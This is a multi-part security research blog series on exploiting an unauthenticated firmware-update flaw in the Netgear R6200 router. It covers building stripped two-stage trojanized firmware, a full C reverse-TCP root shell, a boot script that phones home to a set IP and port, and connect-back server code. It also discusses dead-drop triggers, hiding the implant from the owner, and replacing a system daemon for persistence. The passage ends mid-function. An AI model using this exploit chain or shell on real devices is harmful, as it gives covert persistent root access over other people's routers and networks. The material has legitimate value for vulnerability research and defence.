Thursday, November 05, 2015

In the previous post, we walked through building a stage 1 firmware image that can be flashed to the Netgear R6200 by exploiting the hidden SetFirmware SOAP action in upnpd. Due to an undersized memory allocation, we aren't able to flash a full sized image using this exploit. Whereas a stock firmware is nearly 9MB, the buffer upnpd base64 decodes into is 4MB, leading to a crash. As a result we have to load our trojanized firmware in two stages.

The first stage is stripped down to bare essentials and contains an agent that downloads and flashes a full sized second stage providing persistent remote access. In this part, we conclude the series with a discussion of how to prepare the stage 2 and what it should contain.

Updated Exploit Code

There have been substantial changes to the part 14 code. There is a new exploit script, firmware_exploit.py. This script wraps setfirmware.py from the previous installments, and it also sets up the connect-back servers required by both stages of the payload. Unlike before, it requires no command-line arguments. Instead it takes its configuration parameters from environment.py, which is thoroughly documented. If you haven't already, now is a good time to clone the repository. There's a lot going on in this final part, and perusing the source is the best way to see how it all works. You can clone the repo from: https://github.com/zcutlip/broken_abandoned

Post Exploitation

This and the previous posts focus on the post exploitation phase. This is among my favorite parts of vulnerability research and exploitation. It's the reward for all the head-desking that went into reverse engineering the vulnerable code and debugging your exploit. At this point, your exploit is working, giving you full control over your target. You can run any code you choose on the target as if it was your own. So how do you level that up into something useful? What you do with it depends on your goals and your imagination.

Besides the obvious remote root shell, you could use your compromised host as a platform from which to attack other hosts. Here's a video showing just that. In the video, I demo an exploit chaining framework. The script exploits buffer overflows in three devices. It tunnels through the first to exploit the second, and through the first two to exploit the third. Then the connect-back shell tunnels backwards from the third host, through the second and first. From the perspective of the third host, the exploit came from the second.

If you do go with the root shell, do you want it to be a simple TCP shell, or something more sophisticated, like SSH? You could even have the exploit download and execute an arbitrary payload from the internet for maximum flexibility. Should you have the payload run automatically at boot, or should it lie in wait, checking a dead drop for further instructions?

For this project I'll stick with a simple connect-back TCP shell. This style of payload connects from the target to wherever I choose. Since this requires only an outbound connection from the compromised host, it helps get around filtering of inbound connections.

Stage 2 Preparation

In the previous part I described embedding the mtd utility from OpenWRT in the first stage in order to write stage 2. The mtd utility is ideal because it's so simple and handles the semantics of unlocking, erasing, and writing flash memory. Due to its simplicity, however, mtd has no knowledge of the ambit firmware format, nor does it know to write the firmware footer at the end of the flash partition. The mtd utility simply writes an opaque blob to whatever /dev/mtd device you specify. Because it was late when I was finishing up this project, I didn't want to write and debug a custom utility to run on the target that could parse the ambit format. I wanted to keep as much of the complexity as possible in the pre-exploitation phase and out of post-exploitation. This reduces the likelihood of things going wrong on the target device, from which you can't easily recover. I decided to preprocess the firmware image using Python and generate a flat file that could be laid down on the appropriate flash partition. I've added a tool, called make_mtd.py, to the repo that does the conversion.

Here's an example of it in action, generating a binary image exactly the size of the target flash partition:

Of course you'll need to serve up the second stage somehow. Recall that we had a script in stage 1 run at boot time and use wget to download stage 2. We'll need to serve the flattened second stage over HTTP.

Up to now, we've been using Bowcaster primarily to build the firmware image. Its API for describing buffer overflow strings and ROP gadgets happens to be convenient for describing the ambit and TRX headers. However, Bowcaster also provides a number of server classes for exploit payloads to call back to. One of those classes is a special-purpose HTTP server. I found myself wanting an HTTP server to terminate after serving one or more specific payload files, allowing the exploit script to move on to the next stage. The class that does this is HTTPConnectbackServer. It's simple to use. You provide a list of files to serve (files may be listed multiple times if they are to be served multiple times), an address to bind to, and optionally a port and document root:

files_to_serve = sys.argv[1].split(",")
httpd = HTTPConnectbackServer(ip_address, files_to_serve)
httpd.serve()
# wait() blocks until server terminates
httpd.wait()
# do rest of exploit...

Once the second stage has been served up, the exploit script moves on to the next phase. This allows the script to run synchronously with payload execution on the target.
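To make the serve-then-terminate idea concrete, here is a minimal standard-library sketch of a server that stops once every listed file has been fetched. It is not Bowcaster's implementation; OneShotHTTPServer, OneShotHandler, and serve_until_done are hypothetical names used only for illustration.

```python
import http.server
import os
from collections import Counter


class OneShotHTTPServer(http.server.HTTPServer):
    """Hypothetical stand-in: tracks how many times each file may still be served."""

    def __init__(self, address, files_to_serve, docroot="."):
        super().__init__(address, OneShotHandler)
        # Listing a file twice means it may be downloaded twice.
        self.pending = Counter(files_to_serve)
        self.docroot = docroot

    def done(self):
        return sum(self.pending.values()) == 0


class OneShotHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        name = self.path.lstrip("/")
        # Only names that are still pending are served; anything else is a 404.
        if self.server.pending[name] <= 0:
            self.send_error(404)
            return
        with open(os.path.join(self.server.docroot, name), "rb") as f:
            body = f.read()
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
        self.server.pending[name] -= 1

    def log_message(self, fmt, *args):
        pass  # keep the sketch quiet


def serve_until_done(server):
    """Handle requests one at a time until every listed file has been served."""
    while not server.done():
        server.handle_request()
    server.server_close()
```

Calling serve_until_done() blocks in the same way the wait() call above does, so whatever follows it in an exploit script only runs after the target has fetched its payload.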

Stage 2 Payload

This brings us to the next question: what should the second stage firmware include? As I explained above, the options are practically unlimited. For the sake of simplicity, we'll stick with a reverse TCP shell that we can configure to phone home. This provides a remote root prompt without our having to worry about interference from a firewall or NAT router between us and the target. Further, you could have a completely separate system receive the remote shell, even from outside the target's network. That other system would require no knowledge of the target's hostname or IP address.

Many readers will already be familiar with the reverse shell, but for those that aren't, here's a typical C implementation that we'll cross-compile and bundle into the firmware. It's fairly straightforward if you're accustomed to C programming on Linux.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>

/*
 * Create reverse tcp connect-back shell.
 * ./reverse <IP address> <port>
 * IP address   address of host to connect back to.
 * port         port on host to connect back to.
 */
int do_rtcp(const char *host, const char *port)
{
    char *ex[4];
    int s;
    struct addrinfo hints;
    struct addrinfo *res;
    int ret;

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;

    ret = getaddrinfo(host, port, &hints, &res);
    if (ret != 0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(ret));
        return 1;
    }

    s = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
    if (s < 0) {
        perror("socket");
        return 1;
    }

    ret = connect(s, res->ai_addr, res->ai_addrlen);
    if (ret < 0) {
        perror("connect");
        return 1;
    }

    /* Replace stdin, stdout, and stderr with the socket, since all of
     * our input and output will go to and come from the remote host. */
    dup2(s, 0);
    dup2(s, 1);
    dup2(s, 2);

    /* Now exec /bin/sh, which replaces this process. The new /bin/sh
     * process will keep the file descriptors we dupped above.
     * ex[0] is the path to execute; the argv array starts at ex[1]. */
    ex[0] = "/bin/sh";
    ex[1] = "sh";
    ex[2] = NULL;
    execve(ex[0], &ex[1], NULL);

    /* We should never get to this point, so something went wrong. */
    return 1;
}

int main(int argc, char **argv)
{
    const char *host;
    const char *port;
    pid_t child;

    if (argc != 3) {
        fprintf(stderr, "%s <IP address> <port>\n", argv[0]);
        exit(1);
    }

    printf("Forking.\n");
    child = fork();
    if (child) {
        printf("Child pid: %d\n", child);
        exit(EXIT_SUCCESS);
    } else {
        printf("We have forked. Doing connect-back.\n");
        host = argv[1];
        port = argv[2];
        exit(do_rtcp(host, port));
    }
}

How should we kick off the reverse shell? The simplest way is to phone home with your reverse shell immediately. While simple, this method is not without problems. Perhaps outbound internet connectivity isn't yet available, or you may not have a reverse shell listener available to receive the connection. As such, you may want to wait until a prearranged condition is satisfied. You could have your boot-time agent check a dead drop such as an HTML comment on a website. Or it could perform a DNS query looking for a specific IP address.

For this project, we'll keep it simple, and just fire off the reverse shell automatically on boot. Recall from last time, we replaced the /sbin/wpsd executable with a shell script that was responsible for downloading and flashing the second stage. Unfortunately we can't use that trick again; we need to restore the original wpsd binary so the router can function normally. There is, however, an executable that isn't likely to be missed if we replace it.

Almost every consumer Netgear device has a telnet backdoor listening on the LAN. There is a daemon, telnetenabled, that listens for a magic packet on the network which causes it to start up telnet. Since this service isn't essential for normal operation, we can replace it with our shell script. It also helps that telnetenabled runs late in the boot process, so hopefully network connectivity has been established.

#!/bin/sh
# WAN or LAN host is fine here.
host=10.12.34.56
port=8081
# We could put this in a loop if we wanted to phone home even
# after the initial connection, or if network connectivity isn't
# always available.
/usr/sbin/reverse-tcp $host $port

And with that we should have our remote root shell, assuming everything has gone right. This final part combines a lot of pieces, both on the target and on our end. I've covered most of it here, but if you want to see how it all fits together, check out the part 14 addition to the source code repository.

Summary:

So, to recap, here's a summary of the exploitation process from start to finish:

Send a string to upnpd, probably in the form of HTTP headers but not necessarily, containing SetFirmware.

Ensure a Content-Length: header with a value greater than 102401 is in the initial string.

Be sure the firmware image is less than 4MB; it gets base64 decoded into an undersized buffer.

upnpd triggers a reboot into the stripped-down firmware.

A script downloads a flattened, full-size firmware image and writes it to flash memory.

The router reboots a second time.

A script (put in place of Netgear's telnet backdoor) kicks off a reverse-TCP shell session to a predetermined destination, yielding remote root access.

One More Thing

While the reverse-TCP agent gives us complete, remote control over the device, its operation is essentially invisible to the user. In fact, there's almost no way to tell by inspection that we've taken over the device. For the purposes of real-world exploitation, this is ideal. The router continues to function as normal with no indication otherwise. For demonstration purposes, however, wouldn't it be cool if we could leave a calling card, so to speak? This could be some sort of easily identifiable sign that there are no tricks up our sleeve--that we really have owned the target.

In the router's web interface, there is a "Netgear Genie" logo in the upper lefthand corner. This logo comes from /www/img/Netgeargenie.png on the router's filesystem. When we're building the second stage firmware image, we can replace that image with one of our choosing (giving it the same name of course). After the last reboot, when we log into the router's web interface, there can be no doubt who's in charge.

This device has been truly and completely pwned.

There are a lot of moving parts, and we've covered a lot of ground in 14 installments. I'll leave you with the video I included in the prologue that shows it all come together. Come for the 'sploits, stay for the music.

Thursday, October 08, 2015

In the first twelve parts of this series, we identified an unauthenticated firmware update feature in the Netgear R6200 wireless router. Unfortunately, this feature was broken and only partially implemented, making exploitation less than straightforward. We reverse engineered the timing requirements and structure of the SOAP request required to exploit this vulnerability. We also reverse engineered the firmware image format, including its undocumented firmware header.

As of the previous part, the exploitation phase is complete, which is to say we are able to have the Netgear UPnP daemon overwrite the firmware on flash storage with arbitrary data of our choosing. We are able to do this without authentication.

This and the next part will cover post exploitation. We're able to write a firmware with whatever customization we desire. How should we trojanize the firmware image so that the exploit yields persistent remote access?

Updated Exploit Code

This week's update to the proof-of-concept code is substantial. There is a new part_13 directory that corresponds to this post. The SetFirmware exploit and firmware generation code remain the same. However, there is a new payload-src directory which contains code for generating a stage 1 (and later, stage 2) payload. The README in part_13 has been updated with details on assembling the stage 1 firmware. Now is a good time to do a git pull. If you don't have the code, you can clone it from: https://github.com/zcutlip/broken_abandoned.git

Recap

Before discussing post-exploitation firmware, it's worth recapping how the exploit works. It goes roughly like this:

Send HTTP headers for a SOAP request, including a magic Content-Length value

Sleep one second

Send remainder of the SOAP request with trojan firmware base64 encoded within

Sleep 1-2 seconds

The firmware must be stripped down to less than 4MB to avoid crashing upnpd

If the firmware header passes minimal inspection and avoids crashing upnpd, it is written to flash, replacing the original firmware

The target reboots into the new firmware

Unfortunately, due to the bug that crashes upnpd, the firmware image must be stripped down to a size such that it's barely functional. In part 11 we stripped out everything except what is required for the device to successfully boot and have internet connectivity. This even included the web server. This has a couple of implications. The first is that this exploit requires a two-stage payload, since we can't leave the device with a stripped down firmware. The first stage must download the second stage, a full-blown, trojanized firmware image, and flash it. The device must then reboot into stage 2.

The second implication is that there is nothing remaining in the stripped down firmware with which to parse and flash the second stage firmware image. We'll need to come up with a mechanism to do the downloading and flashing of stage 2 and integrate it into the minimized stage 1 image. Of course, in order to stay under 4MB, this mechanism must be as small as possible.

How to Bootstrap Stage 2?

This can be broken down into two problems:

How to kick off this process automatically at boot time?

How to parse and flash the firmware image?

The first part is relatively easy. As I mentioned in part 11, the boot sequence is brittle and not at all configurable. There's a binary executable that kicks off the various services in a particular order. Some of those services kick off other services. There is no editable script or configuration file that determines what should run and in what sequence. It's unclear what the impact will be if a service fails to start. If you recall, to trick the system into thinking every service had started successfully, we replaced each service with a shell script of the same name that exits with a successful status. It is simple to edit one of those dummy scripts to download and flash the stage 2 image. I recommend choosing one of the last scripts in the boot sequence to ensure networking has been configured. I chose the /usr/sbin/wpsd script; it runs late in the boot sequence. Luckily, we still have wget on the system (it's one of busybox's personalities), so downloading the second stage is simple.

For the second problem, flashing the downloaded image, we'll need to provide a utility, since there's nothing left that will do this for us. Because it was late at night when I was working on this part, I didn't want to spend time writing my own utility to parse the ambit image and to do the gymnastics involved in writing the image. Fortunately, the OpenWRT project provides an mtd-writing utility that handles all the semantics of unlocking, erasing, and writing /dev/mtd flash memory devices.

I had to patch the utility to remove functionality we don't need, thereby eliminating some library dependencies. Since OpenWRT is GPL licensed, I didn't want to include it in this project's source code. The README in part 13 of the PoC code describes how to clone my mtdwriter project and put it in the right place so the stage 1 Makefile will find and build it. For the curious, the customized mtd utility is located here: https://github.com/zcutlip/mtdwriter

You will, of course, need a uClibc little endian MIPS cross compiler to build it. I recommend using buildroot to build the cross compiler.

OpenWRT's mtd doesn't know anything about the ambit firmware image. It's only useful insofar as it can write arbitrary data to a /dev/mtd device. This actually works out for the best; bootstrapping the second stage is a sensitive operation. If anything goes wrong, the target device will be bricked. Moving as much complexity as possible off the target and into the payload building stage is good.

Since we already have code that generates an ambit firmware image, the easiest thing to do is to preprocess that file and turn it into a flat image that can be laid down on the appropriate flash partition. The mtd utility just writes an opaque blob with no knowledge of what it's writing.

Below is the "fake" wpsd script that downloads the second stage and flashes it using the mtd utility.

When we roll those changes into the minimized stage 1 firmware, then exploit the UPnP server, the device should reboot, then download and flash the second stage firmware image. You'll need to serve the stage 2 image over HTTP so wget can download it. We'll cover that in part 14.

Also in the next and final part, we'll discuss preprocessing an ambit image for easy writing to flash. We'll also address what the second stage firmware should contain such that it yields persistent, remote access.

Thursday, September 17, 2015

In the previous part, I described how to strip out all but the most essential services and libraries in the stock firmware in order to get the firmware image down to under 4MB. This avoids crashing upnpd, which allocates less than half the memory needed to base64 decode a stock-sized firmware image.

In this part, we'll walk through a crasher you might encounter (or might not, depending how you formatted your ambit header) and how to sidestep it.

Updated Exploit Code

I last updated the exploit code for part 11, when we added a checksum to the ambit header whose absence prevents the router from booting. In this part I've updated the code to add an additional field to the ambit header that, in some cases, will prevent a post-exploitation crash in upnpd. If you've previously cloned the repository, now would be a good time to do a pull. You can clone the git repo from:

An Invalid free() Crashes the Party

Remember how this firmware updating "feature" in upnpd is buggy and only partially implemented? Well right at the very end, after upnpd writes the size/checksum footer to the flash partition, the decoded firmware buffer gets passed to free(). All good, right? Except not really, because it isn't exactly the decoded firmware buffer. It's the buffer plus ambit header size. Oh shit!

Oh noes! Death can occur!

Here's what's happening.

Oh snap! We free()ed the wrong thing.

This is super shitty. If upnpd crashes before it can reboot the target, we're sunk; we've lost control of the device at that point.

In some cases this won't crash the program, though who knows in what state the process's heap will be. Other times this definitely results in a crash. In order to know why, it helps to understand a little about how libc dynamically allocates memory.

Spelunking in free() and malloc()

uClibc, the C library the Netgear R6200 uses, has three different malloc/free implementations: malloc, malloc-standard, and malloc-simple. Which one gets used is determined at compile time. Which implementation our device uses can be verified by first finding a symbol that is only referenced by a single malloc implementation.

Presence of the __malloc_state symbol indicates the target's libc is built with the malloc-standard implementation. We can now focus source code analysis in the right place. Let's have a look at uClibc source, specifically /libc/stdlib/malloc-standard/malloc.h.

See, when you call malloc(), the pointer you get back (and later pass to free()) doesn't actually mark the beginning of the chunk of memory allocated. There is metadata prepended to your buffer. Although malloc implementations vary, what you see above is fairly typical. There is a size of the current allocated chunk, as well as the size of the previous chunk, if there is one.

If you pass an arbitrary address to free(), there's no telling what's going to happen. This is undefined behavior and what happens next depends on the malloc implementation, the state of the heap, and the chunk metadata. Maybe nothing will happen. Or there could be heap corruption, which may or may not be exploitable. Alternatively, the program could crash in free() if an invalid dereference occurs.

As I was reverse engineering the R6200's firmware header, upnpd crashed predictably under certain conditions. When the chunk metadata was used to compute a pointer to the next chunk, the result was an invalid address. The dereference of that nextchunk pointer then caused a crash.

Location of the crash in free() due to freeing an invalid pointer.

A way of avoiding the crash is to insert fake chunk metadata in the firmware header[1]. It is the address of the TRX image in memory that upnpd attempts to free. Unfortunately the only way to cause free() to bail immediately is to pass it a NULL pointer. However, if it thinks the allocated memory chunk is zero bytes, it takes a much shorter path and avoids the crash. So, right at the end of the firmware header and before the TRX image, you may insert a 4-byte "chunk metadata" field equal to zero.
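The effect of that zero field can be sketched with a little arithmetic. The following assumes the dlmalloc-style layout that malloc-standard uses on a 32-bit target, where the size word sits in the 4 bytes immediately before the pointer handed to free() and its two low bits are flags. The address is made up for illustration, and the function names simply mirror the usual dlmalloc macros.

```python
SIZE_SZ = 4                    # sizeof(size_t) on 32-bit MIPS
PREV_INUSE = 0x1               # low bits of the size word are flags
IS_MMAPPED = 0x2
SIZE_BITS = PREV_INUSE | IS_MMAPPED


def mem2chunk(mem):
    """The chunk header starts two size words before the user pointer."""
    return mem - 2 * SIZE_SZ


def chunksize(size_word):
    """Strip the flag bits to get the chunk size."""
    return size_word & ~SIZE_BITS


def next_chunk(mem, size_word):
    """Address free() would treat as the following chunk."""
    return (mem2chunk(mem) + chunksize(size_word)) & 0xFFFFFFFF


# Hypothetical address of the TRX image inside the decoded buffer.
trx_ptr = 0x2B000040

# If the 4 bytes before the TRX image hold arbitrary header data,
# the computed "next chunk" can land far outside the buffer.
print(hex(next_chunk(trx_ptr, 0x61354161)))

# With a zero size word, the "next chunk" is the fake chunk itself,
# which sits in the header bytes just before the TRX image.
print(hex(next_chunk(trx_ptr, 0)))
```

This only models the pointer arithmetic; which path free() takes afterward still depends on the rest of the heap state.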

Referring back to the header/image diagram from above, the firmware layout now looks like:

This still may result in some heap corruption, but the firmware has already been written, and upnpd is moments away from rebooting the device. We only need to avoid crashing long enough for the reboot.

In the next two parts, we finish up with a discussion of post-exploitation. As of this part we have successfully exploited the SetFirmware SOAP action, causing upnpd to overwrite the firmware with arbitrary data of our choosing. The next steps will be to make that data useful for persisting remote access to the target. Stay tuned!

------------------------------
[1] Credit to former colleague @dongrote for suggesting playing games with malloc metadata might help avoid crashing in free().

Thursday, July 16, 2015

In the previous part, we moved away from emulation to working with physical hardware. We identified a UART header inside the Netgear R6200 that can be used for console access. I demonstrated how to access the CFE bootloader's recovery mode to reflash a working firmware over TFTP. This makes it possible to iteratively modify and test firmware images that will be used in the SetFirmware UPnP exploit.

In this part, I'll talk about regenerating the filesystem portion of the firmware image. I'll also walk through shrinking the filesystem in order to avoid crashing upnpd.

Updated Exploit Code

I last updated the exploit code for part 9, when we filled out the "janky" ambit header enough to satisfy upnpd. In this part I've updated the code to add an additional header field that must be filled in order to boot. If you've previously cloned the repository, now would be a good time to do a pull. You can clone the git repo from:

Regenerating the Filesystem

Recall from before that the firmware image for the R6200 consists of four parts:

Proprietary "Ambit" header

TRX header, which is well documented

Compressed Linux kernel

Squashfs filesystem

We reverse engineered the ambit header by analyzing the httpd and upnpd binaries. The TRX header is well documented and did not need to be reversed. We can reuse the Linux kernel from an existing firmware; no changes to it are required. All that remains is regenerating the SquashFS filesystem.

Generating a SquashFS filesystem is relatively straightforward; there are existing tools to turn a root filesystem directory into a filesystem image. The problem lies in the many different variations of SquashFS. In addition to the various official versions, vendors tweak it further for their own motivations. As a result of this proliferation of SquashFS variations, it can be hard to know which SquashFS tool will work with a given device. For this project, we're in luck. Netgear makes available open source GPL archives for most of its consumer products, including the R6200.

You'll find the source code, as well as a precompiled mksquashfs binary. Oddly, there are even intermediate objects from compilation. I always get the feeling that GPL releases from router vendors are just someone's workspace that got tarred up and posted online. Anyway, the mksquashfs binary is the one that I used. It's 32-bit, so I had to install lib32stdc++6 in my 64-bit Ubuntu VM. In theory, you should be able to rebuild the tools from source as well, but I didn't try. I put the executable in my path (~/bin in my case) so I can easily call it from scripts. I also gave it a unique name to differentiate from other SquashFS utilities.

In order to regenerate a filesystem image, you run mksquashfs on the root directory and give it the -noappend and -all-root options:

The first argument is the name of the root directory to convert to an image. The "rootfs.bin" is the name of the image to generate. The "-noappend" option means to not append to an existing image, and the "-all-root" option means to set ownership of all files to root.
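If you drive the build from a script, the invocation described above might be wrapped like this. This is a sketch: the tool name mksquashfs-netgear is a hypothetical stand-in for whatever unique name you gave the Netgear-supplied binary, and only the arguments named in the text are passed.

```python
import subprocess

# Hypothetical name; use whatever you renamed the Netgear binary to.
MKSQUASHFS = "mksquashfs-netgear"


def mksquashfs_command(rootfs_dir, image_path, tool=MKSQUASHFS):
    """Build the argument list: source directory, output image, then options."""
    return [tool, rootfs_dir, image_path, "-noappend", "-all-root"]


def build_image(rootfs_dir, image_path, tool=MKSQUASHFS):
    # check=True raises CalledProcessError if mksquashfs exits non-zero.
    subprocess.run(mksquashfs_command(rootfs_dir, image_path, tool), check=True)


if __name__ == "__main__":
    print(" ".join(mksquashfs_command("rootfs", "rootfs.bin")))
```

Keeping the argument list in its own function makes it easy to log or inspect the exact command before running it.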

Shrinking the Filesystem

When we generate the root filesystem, it comes out to be over 7MB. There are additional options to mksquashfs that affect compression and block size and can impact the resulting image size. I wasn't able to get the resulting image to come out any smaller regardless of what options I used. In some cases, it ended up larger.

We can't change the size of the headers or of the kernel. So that leaves us with only the filesystem. If the total firmware size is to come in under 4MB, we need to get the filesystem down to around 2,700 KB or less. That's down from 7,400 KB. Obviously, there's no way to get a full firmware to fit in this size, or even one that approximates a full firmware.

So what can we do with such a small firmware? Is there even a point in this exercise? My strategy was to strip down the firmware as much as possible to come in under the limit, but still have the router do the following:

boot successfully

have a functioning userspace, including shell

have network connectivity, including to the internet

This first stage firmware should have some sort of agent that phones home to a predetermined server to download a second stage image. It should flash that image, and reboot. The second stage firmware will be a full blown firmware that looks identical to the stock firmware, but contains whatever additional tools and remote access capability we want.

Our goal is to figure out what we can strip out of this firmware while leaving it with a minimum level of functionality to bootstrap the second stage. The uncompressed filesystem takes up 28MB.

$ du -hs rootfs
28M rootfs

There are a number of executables that are tempting to remove, as they seem noncritical. Before doing so, be sure they aren't links to /bin/busybox. Removing a link won't save significant space. The only way to save space with these executables is to rebuild busybox with fewer personalities.
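One way to check is to list every symlink in the extracted root filesystem whose target is busybox. The helper below is a sketch; busybox_links is a hypothetical name, and it assumes the firmware has been extracted to a local directory with its symlinks preserved.

```python
import os


def busybox_links(rootfs):
    """Return paths (relative to rootfs) that are symlinks pointing at busybox."""
    links = []
    for dirpath, dirnames, filenames in os.walk(rootfs):
        for name in filenames + dirnames:
            path = os.path.join(dirpath, name)
            # readlink() gives the raw link target, so absolute targets such
            # as /bin/busybox are matched even though they don't resolve on
            # the build host.
            if os.path.islink(path) and os.path.basename(os.readlink(path)) == "busybox":
                links.append(os.path.relpath(path, rootfs))
    return sorted(links)
```

Anything this returns is a busybox personality rather than a standalone binary, so deleting it won't shrink the image in any meaningful way.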

The first thing that can go is the HTTP server and its resources. The www directory takes 4.6 MB on disk, and httpd takes 1.6 MB.

Removing a system service can be risky. On embedded devices such as this one, the boot sequence can be pretty brittle. Unlike a general purpose Ubuntu or Red Hat server, these are designed with the assumption that no components will be added or removed. If a service is removed that is critical to the boot process, the device may be rendered unusable. To reduce this risk, I replaced any removed system executables with a shell script of the same name that terminates with a successful exit status. This should trick whatever init or rc program is kicking off boot processes into thinking the service started successfully, thereby allowing the boot sequence to proceed uninterrupted.

Here's a script that replaces a given system binary with a dummy script:
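A minimal Python sketch of that replacement step follows. It is an illustration rather than the script from the repository; replace_with_dummy is a hypothetical name, and it assumes the firmware's root filesystem has been extracted to a local directory.

```python
import os
import stat

# The dummy does nothing except report success to whatever launched it.
DUMMY_SCRIPT = "#!/bin/sh\nexit 0\n"


def replace_with_dummy(rootfs, binary_path):
    """Replace rootfs/<binary_path> with a shell script that exits 0."""
    target = os.path.join(rootfs, binary_path.lstrip("/"))
    if os.path.islink(target):
        # Links (for example, to busybox) take almost no space; leave them alone.
        raise ValueError("%s is a symlink; removing it saves no space" % target)
    os.remove(target)
    with open(target, "w") as f:
        f.write(DUMMY_SCRIPT)
    # rwxr-xr-x, so the boot sequence can still execute it.
    os.chmod(target, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP
             | stat.S_IROTH | stat.S_IXOTH)
    return target
```

For example, replace_with_dummy("rootfs", "/usr/sbin/httpd") swaps the web server for a script of a few bytes.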

As I removed each service, I generated a new, complete firmware image and installed it through the R6200's web interface to be sure the device would still boot and had network connectivity. Of course even if it does boot and run, you've now removed the web interface. This means there's no facility to reinstall the factory firmware. You'll need to recover via the serial interface I described in part 10. Using the serial console, you can recover using the bootloader's TFTP server.

For each service you remove, there may be shared libraries that are no longer needed. Those can be removed as well. An easy trick is to grep all the remaining executables for a given library's name. Here's a script you can paste into the terminal as a one-liner that will use grep to discover what executables link what shared libraries.

The libvolume_id.so shared library evidently isn't linked by anything and can be removed. The libvorbis.so shared library is linked by the DLNA service and may be removed once that service is removed. Re-run the script to generate a new list of library references each time you remove a service. This was a lengthy, iterative process for me. You may remove a critical service by accident or you may remove a library that is critical but not linked directly. It's important to test that each change results in a firmware which will still boot.
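The grep trick can also be sketched in Python. Like grep, the version below does a plain byte-string search rather than parsing ELF headers, and it scans every regular file, not only executables. The function name and the lib and usr/lib directory locations are assumptions for illustration.

```python
import os


def library_references(rootfs, lib_dirs=("lib", "usr/lib")):
    """Map each shared library name to the files whose bytes mention it."""
    libs = set()
    for lib_dir in lib_dirs:
        full = os.path.join(rootfs, lib_dir)
        if os.path.isdir(full):
            libs.update(n for n in os.listdir(full) if ".so" in n)

    refs = {lib: [] for lib in libs}
    for dirpath, _dirs, filenames in os.walk(rootfs):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            with open(path, "rb") as f:
                data = f.read()
            for lib in libs:
                # Skip the library's own file, which contains its own name.
                if name != lib and lib.encode() in data:
                    refs[lib].append(os.path.relpath(path, rootfs))
    return refs
```

Libraries that map to an empty list are candidates for removal, with the same caveat as above: a library can be critical without being linked directly.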

After we remove httpd and the www directory, the new root file system is just over 7000KB. That leaves 4300 KB to go. Keep repeating this process of removing services from /usr/sbin and /sbin, and corresponding libraries that have no references. Make your changes a few at a time so you know what to put back if the device is no longer functional after rebooting.

With all of these libraries and executables removed, the root filesystem directory was down to 9.8MB from 28 MB. The compressed SquashFS filesystem was down to 2,228KB! That's from a starting point of 7.2MB. After building the complete ambit image (with ambit header, TRX header, kernel, and filesystem), it came to 4121918 bytes, or 0x3EE53E in hex. Recall the undersized malloc() for Base64 decoding was 0x400000. That's 70KB to spare! Kick ass[1].
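The headroom figure is easy to verify with the two numbers quoted above:

```python
DECODE_BUFFER_SIZE = 0x400000   # upnpd's malloc() for the base64-decoded image
image_size = 4121918            # complete ambit image, in bytes

headroom = DECODE_BUFFER_SIZE - image_size

print(hex(image_size))                   # 0x3ee53e
print(headroom, "bytes to spare")        # 72386 bytes to spare
print(round(headroom / 1024, 1), "KB")   # 70.7 KB
```

A check like this is worth running after every rebuild, since adding the stage 1 agent and the mtd utility eats into the same margin.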

Checksum Mismatch!

Now we can try uploading our minimized firmware to the R6200 using the UPnP SetFirmware exploit code[2]. At this point, you definitely need to connect to the UART serial interface if you haven't already. Even if the firmware boots, we've stripped out all the essential services, so there's no other way to see what's happening or what state the device is in after boot. And if it doesn't boot, well, you'll be glad you have the serial connection and CFE's recovery mode.

When I built a firmware and pushed it to the device over UPnP, exploiting the SetFirmware vulnerability, I was able to see the updating progress over the serial console. And then the R6200 rebooted. So close! After the reboot, I saw CFE initializing. And then this.

The CFE bootloader detects a firmware checksum mismatch.

On boot we see:

Image chksum: 0x61354161
Calc chksum: 0x9F3FAE72

Then the boot sequence halts, and CFE helpfully starts up a TFTP server for us.

The image checksum, 0x61354161, looks familiar. Let's go back to the firmware generating script and find_offset().
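A standalone sketch of that kind of lookup follows. It assumes the header was filled with a Metasploit-style cyclic pattern (Aa0Aa1Aa2...) and that CFE prints the field as a big-endian value. The names `cyclic_pattern()` and `pattern_offset()` are illustrative and are not the find_offset() from the repository.

```python
import string
import struct


def cyclic_pattern(length):
    """Build a Metasploit-style pattern: Aa0Aa1Aa2..."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode("ascii")
    return "".join(chunks)[:length].encode("ascii")


def pattern_offset(value, length=1024, byte_order=">"):
    """Return the offset of a 32-bit value in the pattern, or -1 if absent."""
    needle = struct.pack(byte_order + "I", value)
    return cyclic_pattern(length).find(needle)


# The "Image chksum" value CFE printed at boot.
print(pattern_offset(0x61354161))
```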

Oh look. That's the 4-byte value at offset 16. We discovered what this field is for when reversing httpd. From part 7:

We're not done with checksums just yet. The basic block at 0x0043643C is another checksum operation. Once again the data points to "HDR0", but the size is only the value from offset 28. The size from offset 24 is not used this time. The checksum result is the same as before, but this time compared to the value at offset 16. We now know the checksum we compute and store at offset 32, must also be stored at offset 16. Presumably, this would be to calculate a separate checksum without including the mysterious extra section I speculated about above.

So, even though this field is never validated in upnpd (which is why we didn't find it the second time around), it does get checked by CFE at boot. In fact, if we had gone a little farther with static analysis, we would have found a section where sa_parcRcvCmd() seeks to the end of the flash partition, unlocks and erases the last erase-size (65536) bytes, seeks to 8 bytes before the end, then writes the values from field 24, the TRX image size, and from field 16, the TRX image checksum.

Writing the TRX image size and checksum to the end of the flash partition.
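The effect of that section can be modeled on an in-memory copy of the partition. This is a rough sketch under stated assumptions: the byte order of the two values and their exact order within the last 8 bytes are guesses (size first, then checksum, as listed above), and `write_trailer()` is a made-up name. Erased flash reads back as 0xFF, which is what the fill models.

```python
import struct

ERASE_SIZE = 65536  # erase block size reported by the R6200


def write_trailer(partition, trx_size, trx_checksum, byte_order="<"):
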